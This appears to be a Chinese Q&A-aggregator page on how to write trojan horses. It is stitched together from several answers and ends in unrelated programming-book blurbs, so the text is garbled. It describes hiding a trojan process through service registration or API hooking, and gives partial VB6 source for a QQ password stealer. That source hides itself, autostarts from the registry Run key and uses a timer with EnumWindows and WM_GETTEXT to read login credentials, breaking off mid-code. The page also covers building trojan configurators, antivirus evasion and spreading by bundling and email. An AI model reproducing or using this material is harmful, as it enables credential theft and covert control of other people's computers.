育才学习网1.怎么去写木马程序
首先得先了解三个相关的概念:进程,线程和服务。
进程:一个正常的Windows应用程序,在运行之后,都会在系统之中产生一个进程,同时,每个进程,分别对应了一个不同的PID(Progress ID, 进程标识符)这个进程会被系统分配一个虚拟的内存空间地址段,一切相关的程序操作,都会在这个虚拟的空间中进行。
线程:一个进程,可以存在一个或多个线程,线程之间同步执行多种操作,一般地,线程之间是相互独立的,当一个线程发生错误的时候,并不一定会导致整个进程的崩溃。
服务:一个进程当以服务的方式工作的时候,它将会在后台工作,不会出现在任务列表中,但是,在Windows NT/2000下,你仍然可以通过服务管理器检查任何的服务程序是否被启动运行。
想要隐藏木马的服务器端,可以伪隐藏,也可以是真隐藏。伪隐藏,就是指程序的进程仍然存在,只不过是让他消失在进程列表里。真隐藏则是让程序彻底的消失,不以一个进程或者服务的方式工作。
伪隐藏的方法,是比较容易实现的,只要把木马服务器端的程序注册为一个服务就可以了,这样,程序就会从任务列表中消失了,因为系统不认为他是一个进程,当按下Ctrl+Alt+Delete的时候,也就看不到这个程序。但是,这种方法只适用于Windows9x的系统,对于Windows NT,Windows 2000等,通过服务管理器,一样会发现你在系统中注册过的服务。难道伪隐藏的方法就真的不能用在Windows NT/2000下了吗?当然还有办法,那就是API的拦截技术,通过建立一个后台的系统钩子,拦截PSAPI的EnumProcessModules等相关的函数来实现对进程和服务的遍历调用的控制,当检测到进程ID(PID)为木马程序的服务器端进程的时候直接跳过,这样就实现了进程的隐藏,金山词霸等软件,就是使用了类似的方法,拦截了TextOutA,TextOutW函数,来截获屏幕输出,实现即时翻译的。同样,这种方法也可以用在进程隐藏上。
当进程为真隐藏的时候,那么这个木马的服务器部分程序运行之后,就不应该具备一般进程,也不应该具备服务的,也就是说,完全的溶进了系统的内核。也许你会觉得奇怪,刚刚不是说一个应用程序运行之后,一定会产生一个进程吗?的确,所以我们可以不把他做成一个应用程序,而把他做为一个线程,一个其他应用程序的线程,把自身注入其他应用程序的地址空间。而这个应用程序对于系统来说,是一个绝对安全的程序,这样,就达到了彻底隐藏的效果,这样的结果,导致了查杀黑客程序难度的增加。
出于安全考虑,我只给出一种通过注册服务程序,实现进程伪隐藏的方法,对于更复杂,高级的隐藏方法,比如远程线程插入其他进程的方法.
2.怎么编写木马程序
盗号木马~~~~ 楼主,这不是好玩的东西,不过看在高分悬赏的份上,就告诉你吧。
可以通过 SendMessage 发送 WM_GETTEXT 取得密码框中的值,我们可以利用这一点来完成密码的截取。 使用 Timer 控件,监视QQ。
用遍查窗口的方法(EnumWindows),取得所有的窗口标题(GetWindowText),判断其中是否为"QQ用户登录"的标题,取 得QQ登录窗口的子窗口(窗口上的控件)的类名(GetClassName),然后通过 ComboBox、Edit 取得用户名和密码(通过 SendMessage 发送 WM_GETTEXT 取得值)。 由于不能判断外部按键事件的发生,只有通过不断的取得密码值,具体方法如下: 首先取得 用户名的值,然后不停的取密码的值,再判断窗口的标题是否为用户名,如果为用户名,则最后一次密码的值就是真正的密码,到此程序完成。
程序编制 (1)首先为了避免程序被多次装载,造成系统资源的浪费、及不必要的错误。 声明变量、过程及 API 函数,写在 Module1.bas 文件中 Declare Function CreateFileMapping Lib "kernel32" Alias "CreateFileMappingA" (ByVal hFile As Long, lpFileMappigAttributes As SECURITY_ATTRIBUTES, ByVal flProtect As Long, ByVal dwMaximumSizeHigh As Long, ByVal dwMaximumSizeLow As Long, ByVal lpName As String) As Long '创建一个新的文件映射对象 Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long '关闭一个内核对象 Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type Const PAGE_READWRITE = 1 Const ERROR_ALREADY_EXISTS = 183& 建立判断程序是否多启动的过程 Sub Main() Dim ynRun As Long Dim sa As SECURITY_ATTRIBUTES sa.bInheritHandle = 1 sa.lpSecurityDescriptor = 0 sa.nLength = Len(sa) ynRun = CreateFileMapping(&HFFFFFFFF, sa, PAGE_READWRITE, 0, 128, App.title) '创建内存映射文件 If (Err.LastDllError = ERROR_ALREADY_EXISTS) Then '如果指定内存文件已存在,则退出 CloseHandle ynRun '退出程序前关闭内存映射文件 End End If End Sub (2)即时监视,就需要在系统启动时,程序自启动,这里使用修改注册表的方法 声明变量、过程及 API 函数,写在 Module1.bas 文件中 Declare Function RegCreateKey& Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey&, ByVal lpszSubKey$, lphKey&) '在指定的项下创建一个新项。
如指定的项已经存在,那么函数会打开现有的项 Declare Function RegSetValue Lib "advapi32.dll" Alias "RegSetValueA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long '设置指定项或子项的默认值 Const HKEY_LOCAL_MACHINE = &H80000002 Const REG_SZ = 1 建立使程序自启动的过程 sub AutoRun() Dim sKeyName As String, sKeyValue As String, sKeyValueIcon As String Dim Ret As Integer, lphKey As Long sKeyName = "Software\Microsoft\Windows\CurrentVersion\Run" '是启动项在注册表中位置,大家可能通过 regedit.exe 来查看 sKeyValue = App.Path & IIf(Len(App.Path) > 3, "\" & "KillOicq.exe", "KillOicq.exe") 'monitor.exe 为这个程序 Ret = RegCreateKey&(HKEY_LOCAL_MACHINE, sKeyName, lphKey) '创建新的启动项 Ret = RegSetValue&(lphKey&, "", REG_SZ, sKeyValue, 0&) '设置键值 End Sub (3)实现程序自身的隐藏(Me.Hide)、在关闭程序对话框中隐藏。 声明变量、过程及 API 函数,写在 Module1.bas 文件中 Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long Const RSP_SIMPLE_SERVICE = 1 '隐藏 建立实现程序自身在关闭程序对话框中的隐藏的过程 Sub HideMyWin() RegisterServiceProcess lngProcessID, RSP_SIMPLE_SERVICE End Sub (4)即时监视是否运行了 OICQ 加载 1 个 Timer 控件,其 Interval 的值为1(你也可以自己设置,尽量少点),这个程序就是通过 Timer 来实现监视的。
Private Sub Timer1_Timer() EnumWindows AddressOf EnumProc, 0 '枚举窗口列表中的所有父窗口(顶级和被所有窗口),开始监视程序 End Sub 声明变量、过程、函数及 API 函数,写在 Module1.bas 文件中 Option Explicit Declare Function EnumWindows Lib "user32" (ByVal lpEnumFunc As Any, ByVal lParam As Long) As Long '遍查窗口 Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long '取得窗口标题 Declare Function GetClassName Lib "user32" Alias "GetClassNameA" (ByVal hwnd As Long, ByVal lpClassName As String, ByVal nMaxCount As Long) As Long '为指定的窗口取得 类名 Declare Function GetWindow Lib "user32" (ByVal hwnd As Long,。
3.病毒木马怎么写它们的程序
特洛伊木马(以下简称木马),英文叫做“Trojan house”,其名称取自希腊神话的特洛伊木马记。
它是一种基于远程控制的黑客工具,具有隐蔽性和非授权性的特点。
所谓隐蔽性是指木马的设计者为了防止木马被发现,会采用多种手段隐藏木马,这样服务端即使发现感染了木马,由于不能确定其具体位置,往往只能望“马”兴叹。
所谓非授权性是指一旦控制端与服务端连接后,控制端将享有服务端的大部分操作权限,包括修改文件,修改注册表,控制鼠标,键盘等等,而这些权力并不是服务端赋予的,而是通过木马程序窃取的。
从木马的发展来看,基本上可以分为两个阶段。
最初网络还处于以UNIX平台为主的时期,木马就产生了,当时的木马程序的功能相对简单,往往是将一段程序嵌入到系统文件中,用跳转指令来执行一些木马的功能,在这个时期木马的设计者和使用者大都是些技术人员,必须具备相当的网络和编程知识。
而后随着WINDOWS平台的日益普及,一些基于图形操作的木马程序出现了,用户界面的改善,使使用者不用懂太多的专业知识就可以熟练的操作木马,相对的木马入侵事件也频繁出现,而且由于这个时期木马的功能已日趋完善,因此对服务端的破坏也更大了。
所以所木马发展到今天,已经无所不用其极,一旦被木马控制,你的电脑将毫无秘密可言
这里再补充一下,就算是病毒,也是一种程序!!=.= 所以不管是木马还是病毒,其它都属于程序的一种! 远程控制程序
4.如何编写木马程序
常用的编写木马的语言有:c++/c vb delphi 是用这些语言编写木马不但要求程序员对windows底层、服务、注册表、消息机制、hook等非常熟悉,而且要求程序员对网络也有一定的认识,熟悉掌握winsock的使用,以及api的使用,如果想写更高级的木马还要对驱动编程有所了解。
另外就是编写出的木马要做免杀,要精通汇编。楼上说的黑客网站是不教如何编写木马的,只是教编程的基础和网络安全方面的。
至于木马运用,也非常简单,捆绑、挂马、邮件发送等方法都是传播木马的经久不衰的方法。
5.怎样写木马配置程序
第一个问题,如何让一个程序A生成另一个程序B?
方法一,以二进制方式写文件(不推荐)
这种办法就是将要被程序B的二进制数据写入到程序A的代码中
按照文件读写的办法生成文件
这样做的缺点是将生成一个庞大的源文件
充斥着很大篇幅没有可读意义的二进制数据
编译和修改都很慢,因此不推荐
方法二,资源方式(推荐)
程序B作为程序A的一个资源而存在
程序A运行时读取自己的资源并释放到文件即可
这部分代码简单实用
Delphi示例
VC示例
第二个问题,如何配置产生的程序B?
我给出两个办法,都可行
方法一,全局变量
程序B中需要配置的参数采用全局变量描述
全局变量在生成的可执行文件中的偏移地址是固定的
找出这些地址常数
在程序A生成程序B的时候即时修改为希望的数据即可
如何找出地址常数?其实很简单
编译一个程序B 生成B1.exe
改变某全局变量的值 编译生成B2.exe
对比B1.EXE和B2.EXE 不同的地方便是全区变量的地址了
方法二,使用资源
配置部分作为程序B的资源而存在
程序B运行的时候先读取自身的资源获得配置信息
这样配置B既是配置B的资源
专门有一套API函数是针对更新程序资源的
诸如BeginUpdateResource, EndUpdateResource, UpdateResource等等
A生成B之后,紧接着按照配置信息更新B的配置资源即可
6.用什么语言可以写木马程序啊
首先确定你需要什么功能,如果是控制Http服务器的话,就是ASP木马,用脚本语言(VBS、JS)来写,Window自带的记事本就可以胜任 如果是控制Windows的话,就属于一般的Win32木马,几乎什么程序都可以写,不管是MASM32、VC++、VB、Delphi、BCB都可以,个人推荐MASM32,毕竟汇编的东西短小精悍,而且设计直观方便,其他的语言还是比较适合开发应用程序 最开始学编程,我学的是QBASIC。
QBASIC语言程序设计 本书是根据教育部最新颁布的中等职业学校计算机及应用专业《QBASIC编程语言》基础教学基本要求编写,同时参考了教育部考试中心制定的计算机等级考试大纲。本书主要内容包括QBASIC语言的基础知识、基本概念、程序结构及程序设计方法、数组、函数和子程序、字符串、文件 。
为什么学它呢?因为他很简单,刚开始学,最主要的是兴趣。我可不想一开始就被C++打倒。
学习BASIC,你可以使用VB来做编译器.如果你没有电脑,可以在网吧中使用FREEBASIC,这个东东。 本书深入浅地介绍了Visual Basic 6.0中文企业版的编程环境、Visual Basic 6.0语言成分和程序结构、常用内部控件和ActiveX控件的功能和用法、菜单和工具栏、图形图像、文件管理以及数据应用程序的开发技术等内容,还简单介绍了Visual Basic.NET。 本书可作为高?。
ASP程序设计 本书对ASP动态网站编程作了系统的介绍,全书分成四大部分。第一部分为环境配置与ASP编程基础,介绍ASP+SQL Server平台的配置,以及HTML、CSS和VBScript语言的使用。
第二部分为ASP数据库程序设计,介绍了ASP操作Access和SQL Server数据库的三大基本格式,以及如何读?。 2)学C语言,这个东东学好后,就可以学C++,JAVA等东东。
C程序设计(第二版) C语言是国内外广泛使用的计算机语言,是计算机应用人员应掌握的一种程序设计工具。本书第一版于1991年出版,全书针对初学者的特点,精心策划、准确定位、概念清晰、例题丰富、深入浅出,受到专家和读者的一致好评。
普遍认为它是学习C语言的好教材,被全国大多数高校 。 C语言的编译器,如果你自己有电脑,可以使用VC.NET,BC++这些商业软件。
如果象我一样没有,就可以使用一些免费的软件。 DEV-C++ 这个编译器很好,我读书时一直使用。
功能不是很强大,但插件很多。 code::blocks 本书主要针对初学Java的读者,主要介绍了面向对象程序代码的基本概念:创建图形用户接口所要事的可视化对象:基于事件的编程等内容。本书的主要目标是:在合理的编程规则下以一种能够被初级程序员接受的方式介绍上述内容,以期提供给读者工具、技术以及创建并保持程序的 。
Java编程思想(原书第3版) http:/。